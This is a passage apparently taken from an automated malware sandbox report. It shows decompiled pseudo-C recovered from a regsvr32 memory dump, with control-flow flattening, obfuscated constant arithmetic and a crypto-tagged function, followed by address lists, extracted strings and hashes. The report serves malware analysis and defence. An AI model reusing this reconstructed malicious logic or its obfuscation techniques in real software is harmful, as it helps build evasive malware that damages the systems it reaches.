							_v52 = 1;
							_v68 = 2 + _t894 * 2;
							_v48 =  &_v68;
							_t897 = 0x20;
							_v76 = _t897;
							__eflags = E040D49A4(_v212,  &_v56, _v308,  &_v32, _v400, _v220, _v316,  &_v76, _v72, _t897, _t892, _v408, _v324) - _v204;
							_t929 =  ==  ? 0xbed0fa7 : 0x319c4b5;
							E040EFECB(_t1039, _v300, _v180, _v188, _v196);
							E040EFECB(_t892, _v292, _v164, _v172, _v392);
							_t1048 =  &(_t1048[0x18]);
							L17:
							_t1038 = 0x319c4b5;
							goto L15;
						}
						if(_t929 == 0x2e16ae) {
							_push(_v264);
							_push(_v184);
							_push(_v364);
							_t905 = E040EE1F8(0x40d1468, _v420, __eflags);
							_push(_v120);
							_push(_v176);
							_push(_v380);
							__eflags = E040D738A(_v288, _t905, _v232, _v168,  &_v80, E040EE1F8(0x40d1318, _v100, __eflags), _v296) - _v112;
							_t929 =  ==  ? 0x45ef02b : 0x45eecb1;
							E040EFECB(_t905, _v160, _v348, _v412, _v256);
							E040EFECB(_t906, _v372, _v152, _v404, _v92);
							_t1048 =  &(_t1048[0x11]);
							goto L17;
						}
						if(_t929 == _t1041) {
							_push(_v216);
							_push(_v444);
							_push(_v356);
							_t1045 = E040EE1F8(0x40d1438, _v136, __eflags);
							_v44 = _v436;
							_v40 = _v208;
							_v36 = _v96;
							_t918 =  *0x40f6224; // 0x0
							_t974 =  *0x40f6224; // 0x0
							_t919 = E040D50E8( *((intOrPtr*)(_t974 + 0x54)), _v192, _v312, _v272, _v224,  *((intOrPtr*)(_t918 + 0x50)), _v80, _v320, 0x40d1438, 0x40d1438,  &_v44, _v200, 0x40d1438, _v240, _t913);
							_t1052 =  &(_t1048[0x10]);
							__eflags = _t919 - _v248;
							if(_t919 != _v248) {
								_t929 = 0xa3576f8;
							} else {
								_t929 = _t1038;
								_t1046 = 1;
							}
							E040EFECB(_t1045, _v428, _v88, _v388, _v304);
							_t1048 =  &(_t1052[3]);
							goto L15;
						}
						if(_t929 == _t952) {
							_t925 =  *0x40f6224; // 0x0
							_push(_t952);
							_push(_t952);
							_t977 = E040DC5D8( *((intOrPtr*)(_t925 + 0x54)));
							_t1048 =  &(_t1048[3]);
							_t927 =  *0x40f6224; // 0x0
							__eflags = _t977;
							_t929 =  !=  ? _t1041 : _t1038;
							 *((intOrPtr*)(_t927 + 0x50)) = _t977;
							goto L1;
						}
						if(_t929 != _t1038) {
							goto L26;
						}
						E040DF7FE(_v344, _v80, _v352, _v228);
						L9:
						return _t1046;
						L26:
						__eflags = _t929 - 0x45eecb1;
					} while (__eflags != 0);
					goto L9;
				}
			}

0x040d3431
0x040d3437
0x040d3441
0x040d3450
0x040d3457
0x040d3459
0x040d345e
0x040d3469
0x040d346e
0x040d346f
0x040d3473
0x040d347b
0x040d3486
0x040d3491
0x040d349c
0x040d34a4
0x040d34a9
0x040d34b1
0x040d34b6
0x040d34be
0x040d34c9
0x040d34d1
0x040d34dc
0x040d34e7
0x040d34ef
0x040d34fa
0x040d3505
0x040d3510
0x040d351b
0x040d3526
0x040d352e
0x040d3539
0x040d3544
0x040d354f
0x040d355a
0x040d3565
0x040d3570
0x040d357b
0x040d3586
0x040d3591
0x040d359c
0x040d35a7
0x040d35b2
0x040d35bd
0x040d35c8
0x040d35d0
0x040d35db
0x040d35ef
0x040d35f6
0x040d35fe
0x040d3609
0x040d3614
0x040d361c
0x040d3627
0x040d362f
0x040d3637
0x040d363f
0x040d3647
0x040d364f
0x040d365c
0x040d3660
0x040d366d
0x040d3671
0x040d3679
0x040d3684
0x040d368f
0x040d369a
0x040d36a5
0x040d36af
0x040d36ba
0x040d36c5
0x040d36da
0x040d36dd
0x040d36e4
0x040d36ef
0x040d36f7
0x040d36ff
0x040d3707
0x040d370c
0x040d3714
0x040d371f
0x040d372a
0x040d3735
0x040d374b
0x040d3752
0x040d375d
0x040d3768
0x040d3773
0x040d377b
0x040d3786
0x040d3799
0x040d379c
0x040d37ae
0x040d37b5
0x040d37c0
0x040d37cb
0x040d37d6
0x040d37de
0x040d37e9
0x040d37f4
0x040d37ff
0x040d380a
0x040d3812
0x040d381e
0x040d3821
0x040d3825
0x040d382a
0x040d3832
0x040d383a
0x040d3842
0x040d3847
0x040d384f
0x040d3857
0x040d3862
0x040d386d
0x040d3878
0x040d3883
0x040d388b
0x040d3890
0x040d3895
0x040d389d
0x040d38a5
0x040d38b0
0x040d38bb
0x040d38c6
0x040d38ce
0x040d38d6
0x040d38de
0x040d38e6
0x040d38ee
0x040d38f9
0x040d3904
0x040d390f
0x040d391a
0x040d3922
0x040d392f
0x040d393e
0x040d3941
0x040d3945
0x040d394d
0x040d3955
0x040d395d
0x040d3965
0x040d3975
0x040d3979
0x040d397e
0x040d3986
0x040d3991
0x040d399c
0x040d39a7
0x040d39b2
0x040d39bd
0x040d39c8
0x040d39d3
0x040d39de
0x040d39e9
0x040d39f0
0x040d39fb
0x040d3a03
0x040d3a0b
0x040d3a13
0x040d3a1b
0x040d3a23
0x040d3a30
0x040d3a33
0x040d3a3c
0x040d3a40
0x040d3a48
0x040d3a50
0x040d3a5b
0x040d3a63
0x040d3a6e
0x040d3a7e
0x040d3a82
0x040d3a87
0x040d3a8f
0x040d3a97
0x040d3aa2
0x040d3aad
0x040d3ab8
0x040d3ac3
0x040d3acb
0x040d3ad6
0x040d3ae1
0x040d3ae9
0x040d3af9
0x040d3afd
0x040d3b02
0x040d3b0a
0x040d3b1c
0x040d3b1f
0x040d3b26
0x040d3b31
0x040d3b3c
0x040d3b44
0x040d3b51
0x040d3b5d
0x040d3b62
0x040d3b68
0x040d3b70
0x040d3b83
0x040d3b86
0x040d3b8d
0x040d3b95
0x040d3ba0
0x040d3bab
0x040d3bb6
0x040d3bc1
0x040d3bcc
0x040d3bd7
0x040d3be2
0x040d3bed
0x040d3c03
0x040d3c0a
0x040d3c15
0x040d3c20
0x040d3c2b
0x040d3c36
0x040d3c49
0x040d3c4a
0x040d3c51
0x040d3c59
0x040d3c64
0x040d3c77
0x040d3c7e
0x040d3c89
0x040d3c94
0x040d3c9f
0x040d3caa
0x040d3cb2
0x040d3cba
0x040d3cbf
0x040d3cc7
0x040d3ccf
0x040d3cd7
0x040d3cdb
0x040d3ce0
0x040d3ce5
0x040d3ced
0x040d3cf8
0x040d3d03
0x040d3d0e
0x040d3d1c
0x040d3d25
0x040d3d29
0x040d3d31
0x040d3d3c
0x040d3d47
0x040d3d52
0x040d3d5d
0x040d3d68
0x040d3d73
0x040d3d7e
0x040d3d89
0x040d3d91
0x040d3d9c
0x040d3da7
0x040d3daf
0x040d3dba
0x040d3dc2
0x040d3dca
0x040d3dd2
0x040d3ddc
0x040d3de4
0x040d3df9
0x040d3dfc
0x040d3e03
0x040d3e0e
0x040d3e19
0x040d3e2f
0x040d3e36
0x040d3e41
0x040d3e4c
0x040d3e54
0x040d3e5f
0x040d3e6a
0x040d3e7d
0x040d3e80
0x040d3e87
0x040d3e92
0x040d3e9d
0x040d3eb0
0x040d3eb7
0x040d3ec2
0x040d3ecd
0x040d3ee3
0x040d3eea
0x040d3ef5
0x040d3f00
0x040d3f08
0x040d3f13
0x040d3f1e
0x040d3f30
0x040d3f33
0x040d3f3a
0x040d3f42
0x040d3f4d
0x040d3f58
0x040d3f60
0x040d3f6b
0x040d3f7e
0x040d3f85
0x040d3f90
0x040d3f98
0x040d3fa0
0x040d3fa8
0x040d3fb0
0x040d3fb8
0x040d3fc0
0x040d3fcd
0x040d3fd1
0x040d3fd9
0x040d3fe1
0x040d3fec
0x040d3ff7
0x040d4002
0x040d400d
0x040d4018
0x040d4023
0x040d402e
0x040d4036
0x040d403e
0x040d4049
0x040d4054
0x040d405f
0x040d406a
0x040d4077
0x040d4082
0x040d408e
0x040d4095
0x040d409a
0x040d40a3
0x040d40ae
0x040d40b9
0x040d40cc
0x040d40cf
0x040d40d6
0x040d40e1
0x040d40f4
0x040d40fb
0x040d4106
0x040d4111
0x040d4119
0x040d4126
0x040d412a
0x040d412f
0x040d4137
0x040d4142
0x040d414a
0x040d4155
0x040d4165
0x040d4169
0x040d416e
0x040d4176
0x040d417e
0x040d4189
0x040d4194
0x040d419f
0x040d41aa
0x040d41b2
0x040d41b7
0x040d41c4
0x040d41c5
0x040d41c9
0x040d41d1
0x040d41dc
0x040d41e7
0x040d41f2
0x040d41ff
0x040d4209
0x040d420d
0x040d4212
0x040d421a
0x040d4222
0x040d422a
0x040d4232
0x040d423a
0x040d4242
0x040d424a
0x040d4252
0x040d425a
0x040d425f
0x040d4267
0x040d4267
0x040d4267
0x040d426c
0x040d4271
0x040d4271
0x040d4276
0x040d4276
0x040d4276
0x040d4276
0x040d4278
0x00000000
0x00000000
0x040d4628
0x040d462e
0x040d4707
0x040d4714
0x040d471b
0x040d471d
0x040d471d
0x040d4722
0x040d4727
0x00000000
0x040d4727
0x040d4634
0x040d4636
0x040d464e
0x040d465a
0x040d4661
0x040d466c
0x040d4690
0x040d46c7
0x040d46de
0x040d46ef
0x040d46f4
0x040d43ef
0x040d43ef
0x00000000
0x040d43ef
0x040d4638
0x040d463e
0x00000000
0x00000000
0x040d4644
0x040d4644
0x040d427e
0x040d44d1
0x040d44dd
0x040d44e1
0x040d44ec
0x040d44f1
0x040d44fa
0x040d44fc
0x040d4500
0x040d450e
0x040d4526
0x040d452d
0x040d4534
0x040d4543
0x040d4551
0x040d455c
0x040d456a
0x040d4571
0x040d4579
0x040d45d3
0x040d45e3
0x040d45fb
0x040d461b
0x040d4620
0x040d44c7
0x040d44c7
0x00000000
0x040d44c7
0x040d428a
0x040d43f9
0x040d4405
0x040d440c
0x040d4414
0x040d4419
0x040d4427
0x040d442e
0x040d447a
0x040d448e
0x040d449f
0x040d44bf
0x040d44c4
0x00000000
0x040d44c4
0x040d4292
0x040d4311
0x040d431d
0x040d4321
0x040d4334
0x040d433a
0x040d4349
0x040d435e
0x040d437e
0x040d43a9
0x040d43b2
0x040d43b7
0x040d43ba
0x040d43c1
0x040d43ca
0x040d43c3
0x040d43c5
0x040d43c7
0x040d43c7
0x040d43e7
0x040d43ec
0x00000000
0x040d43ec
0x040d4296
0x040d42e9
0x040d42ee
0x040d42ef
0x040d42f8
0x040d42fa
0x040d42fd
0x040d4302
0x040d4306
0x040d4309
0x00000000
0x040d4309
0x040d429a
0x00000000
0x00000000
0x040d42b9
0x040d42c2
0x040d42cc
0x040d472c
0x040d472c
0x040d472c
0x00000000
0x040d4738

Strings

Et, xrefs: 040D3CE5
T9, xrefs: 040D3965
!Sw, xrefs: 040D36F7
J', xrefs: 040D3627
L, xrefs: 040D3D68
c, xrefs: 040D377B
Vdd, xrefs: 040D421A
{, xrefs: 040D3570
)<L, xrefs: 040D3591
_EBM, xrefs: 040D3473
sv, xrefs: 040D3A23
zj, xrefs: 040D3F4D
R, xrefs: 040D3C0A

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !Sw$)<L$Et$L$R$T9$Vdd$_EBM$sv$zj$J'$c${
API String ID: 0-2179300830
Opcode ID: 66aa5edd6ade5cc3f09e98d05283c8ff6d10764ebbf456799b48ff2ef3aee189
Instruction ID: 930b64ff130501790f832c93c74666363e0ec39de65cc7c39a3643a6d5be8a32
Opcode Fuzzy Hash: 66aa5edd6ade5cc3f09e98d05283c8ff6d10764ebbf456799b48ff2ef3aee189
Instruction Fuzzy Hash: FD92EE711093819FE3B9CF25C58AA9FBBE1BBC4308F10891DE1DA96260D7B19949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 040E67E6, Relevance: 17.0, Strings: 13, Instructions: 728
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E040E67E6(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, signed int* _a28, signed int _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
				intOrPtr _v4;
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _t846;
				intOrPtr _t847;
				signed int _t861;
				void* _t866;
				signed int _t867;
				signed int _t874;
				signed int* _t876;
				signed int _t885;
				void* _t937;
				signed int _t946;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				signed int _t968;
				signed int _t969;
				signed int _t970;
				signed int _t971;
				signed int _t972;
				signed int _t973;
				signed int _t974;
				signed int _t975;
				signed int _t976;
				signed int _t978;
				signed int _t980;
				signed int _t985;
				signed int _t986;
				signed int* _t989;
				void* _t991;

				_t876 = _a28;
				_push(_a48);
				_push(_a44);
				_v4 = __ecx;
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_t876);
				_push(_a24);
				_push(_a20 & 0x0000ffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E040EFE29(_a20 & 0x0000ffff);
				_v304 = 0x84e682;
				_t989 =  &(( &_v304)[0xe]);
				_v304 = _v304 + 0xeb1b;
				_v304 = _v304 ^ 0x0f7f391c;
				_v304 = _v304 ^ 0x0ffae881;
				_t874 = 0;
				_v80 = 0xd03450;
				_t978 = 0x7e00160;
				_v80 = _v80 + 0x474c;
				_v80 = _v80 ^ 0x00d07b8f;
				_v40 = 0x62fb41;
				_v40 = _v40 ^ 0x58566629;
				_v40 = _v40 ^ 0x58349da0;
				_v56 = 0xe1b746;
				_v56 = _v56 + 0x8be3;
				_v56 = _v56 ^ 0x00e2c329;
				_v32 = 0xe6e4c5;
				_v32 = _v32 + 0xfb3f;
				_v32 = _v32 ^ 0x00e7a004;
				_v164 = 0x3535e2;
				_v164 = _v164 + 0xb15e;
				_v164 = _v164 + 0xffff4c2e;
				_v164 = _v164 ^ 0x0075336e;
				_v256 = 0xe056c0;
				_v256 = _v256 >> 0xf;
				_v12 = 0;
				_t960 = 0xf;
				_v256 = _v256 / _t960;
				_t961 = 0x75;
				_v256 = _v256 / _t961;
				_v256 = _v256 ^ 0x00040000;
				_v64 = 0xc12004;
				_v64 = _v64 | 0x05a7924d;
				_v64 = _v64 ^ 0x01e7b24d;
				_v200 = 0x3d9b4;
				_v200 = _v200 + 0xffffba05;
				_t962 = 0x4d;
				_v200 = _v200 / _t962;
				_v200 = _v200 >> 0xa;
				_v200 = _v200 ^ 0x00080002;
				_v264 = 0xdbb33c;
				_t963 = 0x21;
				_v264 = _v264 / _t963;
				_v264 = _v264 ^ 0x3bde5a68;
				_t964 = 0x74;
				_v264 = _v264 * 0x67;
				_v264 = _v264 ^ 0x14497559;
				_v172 = 0x2a3d0;
				_v172 = _v172 + 0xffff520a;
				_v172 = _v172 + 0xffffc196;
				_v172 = _v172 ^ 0x0001b670;
				_v16 = 0x40a0dc;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x8000040a;
				_v280 = 0x3a90ef;
				_v280 = _v280 + 0xfffff29b;
				_v280 = _v280 + 0xd15d;
				_v280 = _v280 + 0xffff2fb1;
				_v280 = _v280 ^ 0x003a8498;
				_v276 = 0x2b48bd;
				_v276 = _v276 * 0x59;
				_v276 = _v276 | 0x0b3e9c0e;
				_v276 = _v276 + 0x2f0e;
				_v276 = _v276 ^ 0x0f3f0c8c;
				_v244 = 0xf133cf;
				_v244 = _v244 * 0x50;
				_v244 = _v244 >> 0xe;
				_v244 = _v244 >> 2;
				_v244 = _v244 ^ 0x00004b7f;
				_v220 = 0x48bde3;
				_v220 = _v220 * 7;
				_v220 = _v220 << 3;
				_v220 = _v220 << 7;
				_v220 = _v220 ^ 0xf4c4d41f;
				_v152 = 0xdfcbbb;
				_v152 = _v152 / _t964;
				_v152 = _v152 ^ 0x15954f38;
				_v152 = _v152 ^ 0x1594a2df;
				_v236 = 0x79b2d;
				_v236 = _v236 + 0xffffa56f;
				_v236 = _v236 >> 0xc;
				_v236 = _v236 + 0xffff51ce;
				_v236 = _v236 ^ 0xffff5342;
				_v300 = 0x53b7c5;
				_v300 = _v300 | 0xbc55bbc8;
				_v300 = _v300 >> 0xb;
				_v300 = _v300 * 0x4a;
				_v300 = _v300 ^ 0x06ca0610;
				_v300 = 0x831a37;
				_v300 = _v300 >> 0xa;
				_v300 = _v300 ^ 0xf07c3cef;
				_v300 = _v300 >> 2;
				_v300 = _v300 ^ 0x3c15b978;
				_v296 = 0xbc94b;
				_v296 = _v296 ^ 0xc913797f;
				_v296 = _v296 ^ 0xc91ffb85;
				_v304 = 0xeb47f;
				_v304 = _v304 * 0x21;
				_v304 = _v304 >> 9;
				_v304 = _v304 ^ 0x00079d5b;
				_v296 = 0x863d92;
				_v296 = _v296 | 0xc3fe325e;
				_v296 = _v296 ^ 0xc3f15d89;
				_v304 = 0x8c9292;
				_v304 = _v304 * 0x65;
				_v304 = _v304 * 0x2f;
				_v304 = _v304 ^ 0x2ea0d0e4;
				_v296 = 0x7998c8;
				_v296 = _v296 * 0x1f;
				_v296 = _v296 ^ 0x0ebe6fc9;
				_v304 = 0xc13eda;
				_v304 = _v304 + 0x239b;
				_v304 = _v304 | 0x8aa80eb1;
				_v304 = _v304 ^ 0x8ae5aa52;
				_v304 = 0x2ac635;
				_t965 = 3;
				_v304 = _v304 * 0x1a;
				_v304 = _v304 | 0xa2ccc89a;
				_v304 = _v304 ^ 0xa6da26ac;
				_v296 = 0xd161a;
				_v296 = _v296 >> 0xb;
				_v296 = _v296 ^ 0x00086437;
				_v300 = 0xc8d906;
				_v300 = _v300 << 5;
				_v300 = _v300 / _t965;
				_v300 = _v300 | 0xd3e5db7e;
				_v300 = _v300 ^ 0xdbffc0c3;
				_v304 = 0xa90eaa;
				_t966 = 0x62;
				_v304 = _v304 / _t966;
				_v304 = _v304 ^ 0xa321830c;
				_v304 = _v304 ^ 0xa32eb72c;
				_v296 = 0xc9c90e;
				_v296 = _v296 ^ 0x29ac5136;
				_v296 = _v296 ^ 0x296c2187;
				_v168 = 0xb8ba74;
				_v168 = _v168 >> 0xb;
				_v168 = _v168 | 0xd39b7801;
				_v168 = _v168 ^ 0xd39a1a13;
				_v240 = 0xce03d4;
				_v240 = _v240 + 0xffff6ba1;
				_v240 = _v240 + 0xffff3730;
				_t967 = 0x7e;
				_v240 = _v240 / _t967;
				_v240 = _v240 ^ 0x00015c8a;
				_v144 = 0x76dd98;
				_v144 = _v144 << 0xa;
				_t968 = 0xb;
				_v144 = _v144 / _t968;
				_v144 = _v144 ^ 0x13f9c089;
				_v88 = 0xd6758c;
				_t969 = 0x7c;
				_v88 = _v88 * 0x7d;
				_v88 = _v88 ^ 0x68b07bf0;
				_v112 = 0x136ce2;
				_v112 = _v112 * 0x7a;
				_v112 = _v112 ^ 0x094e8b6c;
				_v160 = 0xc781f4;
				_v160 = _v160 + 0x7b6;
				_v160 = _v160 ^ 0xd2a6870e;
				_v160 = _v160 ^ 0xd267b3cc;
				_v216 = 0x3cec52;
				_v216 = _v216 / _t969;
				_v216 = _v216 + 0xe7c2;
				_v216 = _v216 + 0x185f;
				_v216 = _v216 ^ 0x00083478;
				_v128 = 0xe8ace2;
				_v128 = _v128 + 0xffff5a4b;
				_v128 = _v128 >> 5;
				_v128 = _v128 ^ 0x00080537;
				_v20 = 0xba5f1f;
				_t970 = 0x28;
				_v20 = _v20 / _t970;
				_v20 = _v20 ^ 0x00097bc9;
				_v184 = 0x868bed;
				_v184 = _v184 ^ 0x5d9bbcc4;
				_t971 = 0x15;
				_t985 = 0x61;
				_v184 = _v184 * 0x7e;
				_v184 = _v184 ^ 0xd4635941;
				_v248 = 0xc6bb26;
				_v248 = _v248 + 0x4226;
				_v248 = _v248 + 0x1eaa;
				_v248 = _v248 + 0x143f;
				_v248 = _v248 ^ 0x00cd4d4f;
				_v124 = 0x1449aa;
				_v124 = _v124 >> 7;
				_v124 = _v124 + 0xffff4698;
				_v124 = _v124 ^ 0xfffccf45;
				_v204 = 0xd9ae2a;
				_v204 = _v204 * 0x25;
				_v204 = _v204 | 0x41acc33e;
				_v204 = _v204 + 0xe9b9;
				_v204 = _v204 ^ 0x5ff1a5de;
				_v104 = 0x27630a;
				_v104 = _v104 | 0x34992b3f;
				_v104 = _v104 ^ 0x34bda39f;
				_v28 = 0xa04064;
				_v28 = _v28 | 0x72e9e7d8;
				_v28 = _v28 ^ 0x72e1f0ab;
				_v48 = 0xc4ba01;
				_v48 = _v48 << 7;
				_v48 = _v48 ^ 0x6259539c;
				_v180 = 0x3340f4;
				_v180 = _v180 | 0x3035b2e2;
				_v180 = _v180 << 9;
				_v180 = _v180 ^ 0x6feb3ded;
				_v232 = 0x2e047a;
				_v232 = _v232 >> 0xa;
				_v232 = _v232 * 0x12;
				_v232 = _v232 / _t971;
				_v232 = _v232 ^ 0x0002c217;
				_v72 = 0x299f12;
				_v72 = _v72 << 3;
				_v72 = _v72 ^ 0x0148e07c;
				_v188 = 0xf414db;
				_v188 = _v188 << 0x10;
				_v188 = _v188 / _t985;
				_v188 = _v188 ^ 0x003bf194;
				_v156 = 0xc18fa7;
				_t986 = 0x6b;
				_v156 = _v156 / _t986;
				_t972 = 0xc;
				_v156 = _v156 / _t972;
				_v156 = _v156 ^ 0x0009860f;
				_v208 = 0xbb24e8;
				_v208 = _v208 + 0xd4bb;
				_v208 = _v208 + 0xffffec33;
				_t973 = 0x26;
				_v208 = _v208 / _t973;
				_v208 = _v208 ^ 0x000d494f;
				_v92 = 0xf4dbce;
				_v92 = _v92 + 0x5ee7;
				_v92 = _v92 ^ 0x00f22c8f;
				_v100 = 0x7239d1;
				_v100 = _v100 | 0x01f5add3;
				_v100 = _v100 ^ 0x01f71b27;
				_v292 = 0x4b72c4;
				_t974 = 0x61;
				_v292 = _v292 * 0xb;
				_v292 = _v292 + 0xfffff18f;
				_v292 = _v292 * 0xc;
				_v292 = _v292 ^ 0x26e66304;
				_v224 = 0xeae701;
				_v224 = _v224 << 1;
				_v224 = _v224 << 6;
				_v224 = _v224 | 0xd938d457;
				_v224 = _v224 ^ 0xfd70504c;
				_v108 = 0xa91a4c;
				_v108 = _v108 << 2;
				_v108 = _v108 ^ 0x02a24d10;
				_v68 = 0x46e95;
				_v68 = _v68 ^ 0x636abfcf;
				_v68 = _v68 ^ 0x636edf46;
				_v76 = 0x93e843;
				_v76 = _v76 | 0xba39a6db;
				_v76 = _v76 ^ 0xbaba9d8f;
				_v84 = 0xd50ea2;
				_v84 = _v84 | 0x50ec9d25;
				_v84 = _v84 ^ 0x50f8ba70;
				_v288 = 0x52484f;
				_v288 = _v288 + 0xb430;
				_v288 = _v288 * 0x4c;
				_v288 = _v288 >> 0xb;
				_v288 = _v288 ^ 0x000d4af8;
				_v284 = 0x2da3fa;
				_v284 = _v284 | 0xb3c63afe;
				_v284 = _v284 ^ 0xfce0d7d7;
				_v284 = _v284 + 0xffff4c41;
				_v284 = _v284 ^ 0x4f0e5b87;
				_v52 = 0xe252ad;
				_v52 = _v52 | 0x3c4f00b6;
				_v52 = _v52 ^ 0x3cecbbb2;
				_v60 = 0xab577e;
				_v60 = _v60 << 7;
				_v60 = _v60 ^ 0x55a8aa1a;
				_v148 = 0x5c065f;
				_v148 = _v148 << 0x10;
				_v148 = _v148 / _t986;
				_v148 = _v148 ^ 0x00079968;
				_v252 = 0xfb0d10;
				_v252 = _v252 / _t974;
				_v252 = _v252 << 0x10;
				_v252 = _v252 ^ 0x25f2b671;
				_v252 = _v252 ^ 0xb36c8d69;
				_v260 = 0x776100;
				_v260 = _v260 >> 0x10;
				_v260 = _v260 | 0xe8d0a90c;
				_v260 = _v260 * 0x14;
				_v260 = _v260 ^ 0x304a111f;
				_v268 = 0x4079f3;
				_v268 = _v268 >> 4;
				_t975 = 0x4f;
				_v268 = _v268 * 0x5f;
				_v268 = _v268 + 0x21c5;
				_v268 = _v268 ^ 0x017b7447;
				_v44 = 0x101fed;
				_v44 = _v44 ^ 0x1e85c214;
				_v44 = _v44 ^ 0x1e9d5cc7;
				_v140 = 0xb56248;
				_v140 = _v140 >> 0xb;
				_v140 = _v140 ^ 0xb0648700;
				_v140 = _v140 ^ 0xb06b52ff;
				_v228 = 0x5d2032;
				_v228 = _v228 + 0xe696;
				_v228 = _v228 + 0x90e;
				_v228 = _v228 << 6;
				_v228 = _v228 ^ 0x178d1a7f;
				_v192 = 0x46faa8;
				_v192 = _v192 / _t975;
				_v192 = _v192 + 0x59ff;
				_v192 = _v192 ^ 0x00002efb;
				_v272 = 0x13fbcb;
				_v272 = _v272 + 0xffff66dd;
				_v272 = _v272 * 0x5d;
				_v272 = _v272 + 0xffff70cc;
				_v272 = _v272 ^ 0x070467b9;
				_v136 = 0xda75c;
				_v136 = _v136 << 0xe;
				_v136 = _v136 << 8;
				_v136 = _v136 ^ 0xd703a46a;
				_v24 = 0x98e6;
				_v24 = _v24 | 0x30837cf6;
				_v24 = _v24 ^ 0x308cf6e6;
				_v196 = 0x2348e5;
				_v196 = _v196 + 0xec0b;
				_v196 = _v196 + 0xffff4f76;
				_v196 = _v196 + 0xffff4b3e;
				_v196 = _v196 ^ 0x002962b3;
				_v176 = 0x7bcaf7;
				_v176 = _v176 * 0x37;
				_v176 = _v176 << 4;
				_v176 = _v176 ^ 0xa986161e;
				_v120 = 0x3fa34;
				_v120 = _v120 * 0x49;
				_v120 = _v120 >> 7;
				_v120 = _v120 ^ 0x00066829;
				_v116 = 0x9c5c94;
				_v116 = _v116 + 0x20fd;
				_v116 = _v116 >> 2;
				_v116 = _v116 ^ 0x0025da20;
				_v212 = 0x6b8402;
				_v212 = _v212 + 0x9bc6;
				_v212 = _v212 * 0x74;
				_v212 = _v212 + 0xe621;
				_v212 = _v212 ^ 0x30fe6560;
				_v96 = 0xbe9741;
				_v96 = _v96 + 0xffffd77c;
				_v96 = _v96 ^ 0x00bbad9c;
				_v304 = 0xe465cf;
				_v304 = _v304 >> 4;
				_v304 = _v304 << 5;
				_v304 = _v304 ^ 0x01c3ad6d;
				_v296 = 0xc47264;
				_v296 = _v296 << 0xc;
				_v296 = _v296 ^ 0x4720cdbf;
				_v132 = 0x7ca780;
				_v132 = _v132 + 0xa093;
				_v132 = _v132 << 7;
				_v132 = _v132 ^ 0x3ea11d20;
				_t976 = _v8;
				_t987 = _v8;
				while(1) {
					L1:
					_t937 = 0xd154a5a;
					while(1) {
						_t846 = _v300;
						while(1) {
							L3:
							_t991 = _t978 - 0x7e00160;
							if(_t991 > 0) {
								break;
							}
							if(_t991 == 0) {
								_t978 = 0xfd2ad77;
								continue;
							} else {
								if(_t978 == 0x1a1d1c) {
									__eflags = E040D4BFC(_t976, _a16);
									_t978 = 0x6a5d586;
									_t866 = 1;
									_t874 =  !=  ? _t866 : _t874;
									goto L13;
								} else {
									if(_t978 == 0x352276a) {
										_t867 = E040DDDA9(_v168, _t876, _v280, _t876, _v240, _v144, _t876, _v88, _v112);
										_t987 = _t867;
										__eflags = _t867;
										_t978 =  !=  ? 0x6fee97d : 0xb1727d5;
										E040F2B09(_v160, 0, _v216, _v128);
										_t989 =  &(_t989[0xa]);
										L39:
										_t876 = _a28;
										_t937 = 0xd154a5a;
										goto L40;
									} else {
										if(_t978 == 0x6a5d586) {
											E040EE358(_v196, _v176, _t976, _v120);
											_t978 = 0x6d75a8e;
											goto L12;
										} else {
											if(_t978 == 0x6d75a8e) {
												E040EE358(_v116, _v212, _t846, _v96);
												_t978 = 0xedc04fb;
												L12:
												L13:
												_t876 = _a28;
												goto L1;
											} else {
												if(_t978 != 0x6fee97d) {
													L40:
													__eflags = _t978 - 0xb1727d5;
													if(_t978 != 0xb1727d5) {
														_t846 = _v300;
														continue;
													}
												} else {
													_t846 = E040DED66(_v20, _v184, _t987, _v248, _v124, _v152, _v204, _a40, _t876, _v104, _a20, _t876, _v28, _v48);
													_t876 = _a28;
													_t989 =  &(_t989[0xe]);
													_v300 = _t846;
													_t937 = 0xd154a5a;
													_t978 =  !=  ? 0xd154a5a : 0xedc04fb;
													continue;
												}
											}
										}
									}
								}
							}
							L43:
							return _t874;
						}
						__eflags = _t978 - _t937;
						if(_t978 == _t937) {
